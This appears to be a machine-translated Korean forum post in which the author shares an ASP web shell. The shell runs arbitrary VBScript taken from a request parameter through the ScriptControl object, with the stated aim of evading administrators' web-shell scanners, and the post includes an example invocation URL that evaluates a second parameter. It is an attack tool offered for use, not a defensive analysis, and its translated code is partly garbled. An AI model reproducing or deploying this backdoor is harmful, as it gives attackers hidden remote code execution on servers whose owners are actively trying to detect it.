나는 항상 궁금했습니다. 왜 클라이언트에 eval이나 Execution이 있습니까? 내가 어디에 숨어 있든 관리자는 어떤 XX 웹셸 스캐너를 사용하여 나를 괴롭힐 수 있습니까? 오늘 VB에서 ScriptControl 구성 요소를 다시 조사한 결과 ASP에서도 호출할 수 있다는 사실을 발견했습니다. 나는 그 방법을 연구했고 나중에 lcx와 논의했습니다. 다음과 같은 코드를 받았습니다. 지도해주신 선배님들께 감사 인사를 전하고 싶습니다. 하하.
코드는 매우 간단하므로 누군가가 저를 가장했다고 꾸짖는 것을 피하기 위해 너무 많이 설명하지 않겠습니다.
다음과 같이 코드 코드를 복사합니다.
<%
o = Server.CreateObject(ScriptControl)로 설정
o.언어 = vbscript
o.addcode(Request(SubCode)) '프로세스 코드로서의 매개변수 하위 코드
o.run e,Server,Response,Request,Application,Session,Error '매개변수 이름 e로 호출하고 동시에 6개의 기본 개체를 매개변수로 푸시합니다.
'호출 예:
'http://localhost/tmp.asp?SubCode=sub%20e%28Server,Response,Request,Application,Session,Error%29%20eval%28request%28%22v%22%29%29%20end%20sub&v=response .write%28server.mappath%28%22tmp.asp%22%29%29
%>
사용할 수는 있지만 실험 결과 Lake2 클라이언트만 사용할 수 있는 것으로 나타났습니다. 누군가 나와서 좀 더 일반화할 수 있기를 바랍니다. 헤헤. 자신만의 전용 클라이언트를 작성하는 것도 좋은 생각입니다.